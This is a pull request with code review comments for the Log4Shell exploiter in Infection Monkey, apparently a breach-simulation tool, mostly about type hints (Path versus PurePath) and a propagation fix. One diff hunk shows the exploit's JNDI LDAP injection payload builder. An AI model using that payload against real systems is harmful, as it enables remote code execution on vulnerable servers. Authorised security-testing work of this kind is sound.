### PR TITLE
1782 log4shell

### PR DESCRIPTION
**Pull request by VakarisZ**
# What does this PR do?

Fixes log4shell part of #1782
Fixes a bug in destination path helper
Fixes incorrect propagation state toggle in log4shell

Add any further explanations here.

## Testing Checklist

* [ ] Added relevant unit tests?
* [ ] Have you successfully tested your changes locally? Elaborate:
    > Tested by exploiting machines in GCP
* [ ] If applicable, add screenshots or log transcripts of the feature working

## Explain Changes

Are the commit messages enough? If not, elaborate.

### CODE REVIEW

File: monkey/infection_monkey/exploit/log4shell.py [hunk 1]
```diff
@@ -111,7 +113,7 @@ def _build_ldap_payload(self) -> str:
         interface_ip = get_interface_to_target(self.host.ip_addr)
         return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}"
 
-    def _build_command(self, path, http_path) -> str:
+    def _build_command(self, path: Path, http_path) -> str:
```
Comment (mssalvatore) [inline monkey/infection_monkey/exploit/log4shell.py:116]:
```suggestion
    def _build_command(self, path: PurePath, http_path) -> str:
```

File: monkey/infection_monkey/exploit/tools/helpers.py [hunk 2]
```diff
@@ -20,9 +20,9 @@ def get_random_file_suffix() -> str:
 
 def get_agent_dest_path(host: VictimHost, options: Mapping[str, Any]) -> Path:
```
Comment (mssalvatore) [inline monkey/infection_monkey/exploit/tools/helpers.py:21]: Does the type checker not complain about this? 
```suggestion
def get_agent_dest_path(host: VictimHost, options: Mapping[str, Any]) -> PurePath:
```

**Review by mssalvatore — CHANGES_REQUESTED** [review]

File: monkey/infection_monkey/exploit/tools/helpers.py (hunk 2 above)
Comment (VakarisZ) [reply monkey/infection_monkey/exploit/tools/helpers.py:21]: It doesn't complain because `PurePath` is a descendant of `Path`

Comment (VakarisZ) [reply monkey/infection_monkey/exploit/tools/helpers.py]: ^ not true. Not sure why it doesn't complain

**Pull request merged**